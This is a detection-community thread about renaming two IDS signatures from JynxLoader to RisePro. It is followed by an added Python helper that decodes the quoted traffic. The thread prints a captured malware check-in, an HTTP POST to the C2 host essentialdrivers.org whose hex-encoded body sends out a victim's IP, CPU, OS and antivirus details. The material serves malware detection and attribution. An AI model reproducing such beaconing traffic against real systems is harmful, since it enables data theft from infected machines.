Inconsistency between the rules 2049660 & 2049661 and the family

Hi, there seems to be a little confusion with signatures 2049660 & 2049661. The fact is that it was written in RisePro because the magic and the encrypted bytes 0x36 match its traffic.

Best regards, Jane ˶ᵔ ᵕ ᵔ˶

3 Likes

Hey Jane!

Thanks for the tip! I originally gave these the JynxLoader names because I saw the traffic stem from d4d464e22776e552d215e5fe39373280, which had the following HTTP request. Notice that the User-Agent is the hex-encoded string “JinxV2DEV”.

I just read up on RisePro on the any.run blog and it was very helpful. I’ll get these names updated in today’s release.

POST / HTTP/1.1
Host: essentialdrivers.org
User-Agent: 4a696e785632444556
Content-Length: 234
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

30303430353232383637323737623062363434363836326433333262356637397c33352e3139322e39332e3130377c55537c496e74656c28522920436f726528544d2932204350552036363030204020322e34302047487a7c505441434d3242347c31307c57696e646f777320446566656e646572

Happy Holidays! :snowman: :santa: :woman_elf: :gift:

2 Likes
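As an added example, not code from the thread or from either rule set, here is a small Python triage helper that parses the request above, hex-decodes the User-Agent and the form body, and splits the body on its '|' delimiter so an analyst can see the check-in fields the signature is matching on. The request is embedded as sample input copied from the post; the field layout is just what the decode shows, not a documented format.

```python
import binascii

# Sample input: the HTTP request quoted in the post above, embedded here verbatim.
SAMPLE_REQUEST = (
    "POST / HTTP/1.1\r\n"
    "Host: essentialdrivers.org\r\n"
    "User-Agent: 4a696e785632444556\r\n"
    "Content-Length: 234\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Accept-Encoding: gzip\r\n"
    "\r\n"
    "3030343035323238363732373762306236343436383632643333326235663739"
    "7c33352e3139322e39332e3130377c55537c496e74656c28522920436f726528"
    "544d2932204350552036363030204020322e34302047487a7c505441434d3242"
    "347c31307c57696e646f777320446566656e646572"
)

HEX_DIGITS = set("0123456789abcdefABCDEF")


def is_hex_string(value):
    """True when the value is non-empty, even-length and made only of hex digits."""
    return len(value) >= 2 and len(value) % 2 == 0 and set(value) <= HEX_DIGITS


def parse_request(raw):
    """Split a raw HTTP request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body.strip()


def decode_hex_field(value):
    """Hex-decode a header or body value to ASCII; None if it is not plain hex."""
    if not is_hex_string(value):
        return None
    try:
        return binascii.unhexlify(value).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(raw):
    """Decode the hex User-Agent and the '|'-delimited hex body of a check-in."""
    request_line, headers, body = parse_request(raw)
    user_agent = decode_hex_field(headers.get("user-agent", ""))
    decoded_body = decode_hex_field(body)
    fields = decoded_body.split("|") if decoded_body is not None else []
    return {"request_line": request_line, "user_agent": user_agent, "fields": fields}
```

Running `triage(SAMPLE_REQUEST)` shows the User-Agent decoding to JinxV2DEV and the body decoding to seven pipe-separated host-profile fields (an ID, the public IP, country, CPU string, a host tag, the Windows version and the installed AV), which is the kind of check-in layout the rule's content matches are anchored on.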